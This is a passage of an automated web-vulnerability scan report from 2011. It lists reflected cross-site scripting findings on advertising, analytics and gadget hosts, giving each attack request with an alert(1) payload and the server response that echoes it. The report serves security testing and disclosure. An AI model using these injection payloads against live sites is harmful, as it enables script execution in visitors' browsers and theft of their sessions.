GET /KonaGet.js?u=1300641701477&p=13764&k=http%3A//techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.htmljpNNP3&al=1&l=http%3A//techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.htmled95a"%3balert(1)//a0710f25a4a&t=How+To+Check+PageRank+in+Google+Chrome+%3F&m1=google+chrome+%2C+software&rId=67764811449365425&rl=0&i=14&n=0&dc_aff_id=&cl=0&mp=0&rm=1&mod=8454171&rt=0&st=10&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_&1300641702329 HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=8564E29E-394C-11E0-9E36-00163E201081; cluid=21105147031300549481034; imprs=1

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 5375

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=13764&layout=adlinks&sId=2030&cb=1300641976&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(2);
reJso
...[SNIP]...
aTweakMode=8454427;
konaRequestId="67764811449365425";
konaPageLoadSendReport=0;
setKonaResults(1,0,"L|0|0|0|white|none&pRfr=http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.htmled95a";alert(1)//a0710f25a4a&dc_aff_id=");
onKonaReturn(0);
}, "reaction response");

4.77. http://kona5.kontera.com/KonaGet.js [rId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona5.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3f64"-alert(1)-"ece18e1998 was submitted in the rId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KonaGet.js?u=1300641701477&p=13764&k=http%3A//techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.htmljpNNP3&al=1&l=http%3A//techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html&t=How+To+Check+PageRank+in+Google+Chrome+%3F&m1=google+chrome+%2C+software&rId=67764811449365425e3f64"-alert(1)-"ece18e1998&rl=0&i=14&n=0&dc_aff_id=&cl=0&mp=0&rm=1&mod=8454171&rt=0&st=10&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_&1300641702329 HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=8564E29E-394C-11E0-9E36-00163E201081; cluid=21105147031300549481034; imprs=1

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 4982

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=13764&layout=adlinks&sId=2030&cb=1300641976&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(2);
reJso
...[SNIP]...
value" : 300 } }, { "logo_height" : { "value" : 250 } }, { "advanced_setting_ad_type_id" : { "value" : 10 } } ]});
teDataHere(false,'13764','1');
konaTweakMode=8454427;
konaRequestId="67764811449365425e3f64"-alert(1)-"ece18e1998";
konaPageLoadSendReport=0;
setKonaResults(1,0,"L|0|0|0|white|none&pRfr=http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html&dc_aff_id=");
onKonaReturn(0);
}, "reaction respons
...[SNIP]...

4.78. http://mm.chitika.net/minimall [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mm.chitika.net
Path:   /minimall

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload cb83f%3balert(1)//85d66a58941 was submitted in the callback parameter. This input was echoed as cb83f;alert(1)//85d66a58941 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /minimall?w=728&h=90&client=chr&noctxt=4&sid=ban0dt&url=http%3A//dnstree.com/cx/xss/&query=cx/xss/&type=mpu&noborders=1&vertical=premium&alturl=http%3A//www.robtex.com/ext/ads/buchban&screenres=1920x1200&winsize=1112x916&canvas=1096x139&frm=false&history=1&impsrc=amm&cb=490&loc=188,143&snip_title=xss.cx&output=simplejs&callback=ch_ad_render_searchcb83f%3balert(1)//85d66a58941 HTTP/1.1
Host: mm.chitika.net
Proxy-Connection: keep-alive
Referer: http://dnstree.com/cx/xss/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cc=G/T85aQFoxB5939xhbwl+fD5hqWHYiCDbsDoTXiR7ghSSzFFqdkU6Ts8PN6LVdXA/7iSZXkL3XrgB9l9JAOZiPqF8KNw0jcJuzwnJ0NIVEts/AqvVXilg0aMVLxlBsr+syPvxNzXhB8Vi7qmCVPxNmekgCFp1dMafdeK8spGTWGzkRHU/W5O+G4k7JzRFd/0OOaCgztDFpGKCxZevA+jfM5EuGLu2Y29TlSe8PNFIHqWyl3cgKSBpgFob5hd8PJ0R/trAT1/JQSxLE6xVTTLwmMI684nd0shAmwLc1URONFbAFxm/PSCq7jShumiqMCNOoTJOM6Yspn8MxPkLMiQp+rNkiTN8AmRfq81fz/RyGmK9ABR7A3c0bkE+VHoCMp2pLYpP/q3YQG7/pU3y36HadhUF3RLx6b7.L80PgQYJuaF/eIHiHHkHjw.4

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:38:15 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=; path=/; domain=.chitika.net; expires=Sun Mar 20 17:38:15 2011 GMT
Set-Cookie: _cc=G/T0JjQk4hB9jgs/945Ie6ysuV2X6f1GrfGOHdAxHI3zqTuXgjz7bM7/T1WXxPf8Ww6nIcY40W3r/PZAPRtqT4kEWbw27AHuu7eesHE0zKA98aOz5KQgDOyXOQEOjeWydOBJhsv6+vvr2PgbU8P+6Onw2b5AFsWyr/dILE5iqQ+XgBOmNNiNXxbatocesUOeKotJCDOmQRvOPcwhfoItSntAauhGcRgzz5cKKFlTXqLHI0quCs8qK1ki+9479aQ2ySQnizMiTh+du10BiijDbTJK5o8yY/8DDXR/W5G8cWL1ofV+qx1vS+PJQboaDBQKvACKxxbF14jj86gkVcBp5uKfNjSA3fuH9p9BDEgvtWdbBDt7xotEZ5/WPerpDfoABM/4XZf9K1EgN/XBJrFfwQKSTDwWR8ZrakO09jevybpx154pt/ZowYHFhetY1hGR9F2JUZa7kiyygmrFQNDx.1U6UitWY/IGwylOoVpo0nA.4; path=/; domain=.mm.chitika.net; expires=Mon Mar 19 17:38:15 2012 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 174

var ch_mmhtml = {"pixelhtml":"","reason":"no_items","alturl":"http://www.robtex.com/ext/ads/buchban","output":"","cb":"490"};ch_ad_render_searchcb83f;alert(1)//85d66a58941();

4.79. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 773a1%0aalert(1)//6693e3626f3 was submitted in the url parameter. This input was echoed as 773a1
alert(1)//6693e3626f3
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml773a1%0aalert(1)//6693e3626f3&container=peoplesense&parent=http://saratogaindecline.blogspot.com/&mid=0&view=profile&libs=google.blog&d=0.556.7&lang=en&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22Share+it%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23999999%22,%22ENDCAP_LINK_COLOR%22:%22%2399aadd%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%2399aadd%22,%22CONTENT_TEXT_COLOR%22:%22%23999999%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%2399aadd%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23777777%22,%22CONTENT_HEADLINE_COLOR%22:%22%23aadd99%22,%22FONT_FACE%22:%22normal+normal+100%25+'Trebuchet+MS',Trebuchet,Verdana,Sans-serif%22%7D%7D&communityId=05889504503058521941&caller=http://saratogaindecline.blogspot.com/2011/02/transparency-and-nxivm.html HTTP/1.1
Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Sun, 20 Mar 2011 14:47:29 GMT
Expires: Sun, 20 Mar 2011 14:47:29 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 116

Unable to retrieve spec for http://fcgadgets.appspot.com/spec/shareit.xml773a1
alert(1)//6693e3626f3
. HTTP error 400

4.80. http://pagerank.techie-buzz.com/pagerankfetcher.php [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pagerank.techie-buzz.com
Path:   /pagerankfetcher.php

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 9ee5e<script>alert(1)</script>a73b3542d36 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /pagerankfetcher.php HTTP/1.1
Host: pagerank.techie-buzz.com
Proxy-Connection: keep-alive
Referer: http://pagerank.techie-buzz.com/pagerankfetcher.php?url=http%3A//techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html
Cache-Control: max-age=0
Origin: http://pagerank.techie-buzz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116550147.1300641665.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __gads=ID=2091f9732c90cb51:T=1300641645:S=ALNI_MaM2hAe-lnXOkhykaiFrDAf_1V6kg; __qca=P0-671913769-1300641673847; __utma=116550147.26217198.1300641665.1300641665.1300641665.1; __utmc=116550147; __utmb=116550147.7.6.1300641675933; __utmz=269864560.1300641691.1.1.utmcsr=techie-buzz.com|utmccn=(referral)|utmcmd=referral|utmcct=/softwares/how-to-check-pagerank-in-google-chrome.html; __utma=269864560.626991700.1300641691.1300641691.1300641691.1; __utmc=269864560; __utmb=269864560.1.10.1300641691
Content-Length: 26

url=http%3A%2F%2Fxss.cx%2F9ee5e<script>alert(1)</script>a73b3542d36

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:29:34 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1155

<html>
<head>
<title>Check PageRank For Your Website</title>
<meta name="description" content="Checks PageRank for any given website or URL. This PageRank Checker is part of Techie Buzz tool
...[SNIP]...
<b style="font-family:Verdana;font-size:11px">Page Rank for http://xss.cx/9ee5e<script>alert(1)</script>a73b3542d36 is 0 <img src="http://pagerank.techie-buzz.com/images/page-rank-0.gif" border="0" />
...[SNIP]...

4.81. http://pubads.g.doubleclick.net/gampad/ads [page_slots parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The value of the page_slots request parameter is copied into the HTML document as plain text between tags. The payload 49dc7<script>alert(1)</script>875f71569ea was submitted in the page_slots parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1300641662876&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=ss&client=ca-pub-2703385610225771&page_slots=menu_links%2C336x280_above_post%2C336_below_post%2C160_600_sidebar_2%2C160_600_sidebar%2C300_sidebar_1%2C300_sidebar_3%2C728_above_footer%2Cin_links%2C728x90_top_banner49dc7<script>alert(1)</script>875f71569ea&cookie_enabled=1&ga_vid=26217198.1300641665&ga_sid=1300641665&ga_hid=473153756&url=http%3A%2F%2Ftechie-buzz.com%2Fsoftwares%2Fhow-to-check-pagerank-in-google-chrome.html&lmt=1300658136&dt=1300641664864&cc=16&biw=1112&bih=916&ifi=1&adk=0&u_tz=-300&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMedia=Coun%3ANA/Postal%3ANA/; TMediaISP=SoftLayer%20Technologies; id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __utmz=251550727.1300542524.1.1.utmcsr=mgid.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=251550727.1167224488.1300542524.1300542524.1300542524.1; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 20 Mar 2011 17:25:54 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 28644

GA_googleSetAdContentsBySlotForSync({"336x280_above_post":{"_type_":"html","_expandable_":false,"_html_":"\x3chtml\x3e\x3chead\x3e\x3cstyle\x3e\x3c!--\na:link { color: #000000 }a:visited { color: #000
...[SNIP]...
.com/pagead/sma8.js\"\x3e\x3c/script\x3e\x3c/body\x3e\x3c/html\x3e","_snippet_":false,"_height_":280,"_width_":336,"_empty_":false,"_is_afc_":true,"_is_psa_":false,"_is_3pas_":false},"728x90_top_banner49dc7<script>alert(1)</script>875f71569ea":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#0
...[SNIP]...

4.82. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 5c027<script>alert(1)</script>d2c9d934be8 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1300632431167&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-6213915329796065&slotname=ServerInsiders-TopMost-AdUnit5c027<script>alert(1)</script>d2c9d934be8&page_slots=ServerInsiders-TopMost-AdUnit&cookie_enabled=1&ga_vid=1590812208.1300632431&ga_sid=1300632431&ga_hid=38308170&url=http%3A%2F%2Fserverinsiders.com%2Fisp%2Fsophidea-inc.html&lmt=1286371390&dt=1300632431168&cc=6&biw=1112&bih=916&ifi=1&adk=2135164243&u_tz=-300&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://serverinsiders.com/isp/sophidea-inc.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMedia=Coun%3ANA/Postal%3ANA/; TMediaISP=SoftLayer%20Technologies; id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __utmz=251550727.1300542524.1.1.utmcsr=mgid.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=251550727.1167224488.1300542524.1300542524.1300542524.1; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 20 Mar 2011 14:48:33 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2769

GA_googleSetAdContentsBySlotForSync({"ServerInsiders-TopMost-AdUnit5c027<script>alert(1)</script>d2c9d934be8":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f
...[SNIP]...

4.83. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 1e941%0aalert(1)//a64e8b16e22 was submitted in the url parameter. This input was echoed as 1e941
alert(1)//a64e8b16e22
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/members.xml1e941%0aalert(1)//a64e8b16e22&container=peoplesense&parent=http://saratogaindecline.blogspot.com/&mid=1&view=profile&libs=google.blog&d=0.556.7&lang=en&communityId=05889504503058521941&caller=http://saratogaindecline.blogspot.com/2011/02/transparency-and-nxivm.html HTTP/1.1
Host: r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Sun, 20 Mar 2011 14:47:29 GMT
Expires: Sun, 20 Mar 2011 14:47:29 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 126

Unable to retrieve spec for http://www.google.com/friendconnect/gadgets/members.xml1e941
alert(1)//a64e8b16e22
. HTTP error 400

4.84. http://s46.sitemeter.com/js/counter.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s46.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 198b1'%3balert(1)//ec0fe0a2900 was submitted in the site parameter. This input was echoed as 198b1';alert(1)//ec0fe0a2900 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/counter.asp?site=s46seo101198b1'%3balert(1)//ec0fe0a2900 HTTP/1.1
Host: s46.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 20 Mar 2011 17:13:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7316
Content-Type: application/x-javascript
Expires: Sun, 20 Mar 2011 17:23:42 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
bj.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s46seo101198b1';alert(1)//ec0fe0a2900', 's46.sitemeter.com', '');

var g_sLastCodeName = 's46seo101198b1';alert(1)//ec0fe0a2900';
// ]]>
...[SNIP]...

4.85. http://s46.sitemeter.com/js/counter.js [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s46.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58f06'%3balert(1)//280effdb020 was submitted in the site parameter. This input was echoed as 58f06';alert(1)//280effdb020 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/counter.js?site=s46seo10158f06'%3balert(1)//280effdb020 HTTP/1.1
Host: s46.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 20 Mar 2011 17:13:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7316
Content-Type: application/x-javascript
Expires: Sun, 20 Mar 2011 17:23:58 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
bj.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s46seo10158f06';alert(1)//280effdb020', 's46.sitemeter.com', '');

var g_sLastCodeName = 's46seo10158f06';alert(1)//280effdb020';
// ]]>
...[SNIP]...

4.86. http://seo101.co/xss.cx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload c5cde</title><script>alert(1)</script>79857da5316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde</title><script>alert(1)</script>79857da5316 HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:16:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=026e1f13e15714f933861fb6bd07bbaf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title><script>alert(1)</script>79857da5316 SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.87. http://seo101.co/xss.cx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff125"><script>alert(1)</script>977dd139795 was submitted in the REST URL parameter 1. This input was echoed as ff125\"><script>alert(1)</script>977dd139795 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxff125"><script>alert(1)</script>977dd139795 HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:16:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=b6cc9f1af21028fbb01962985d244738; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26771


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
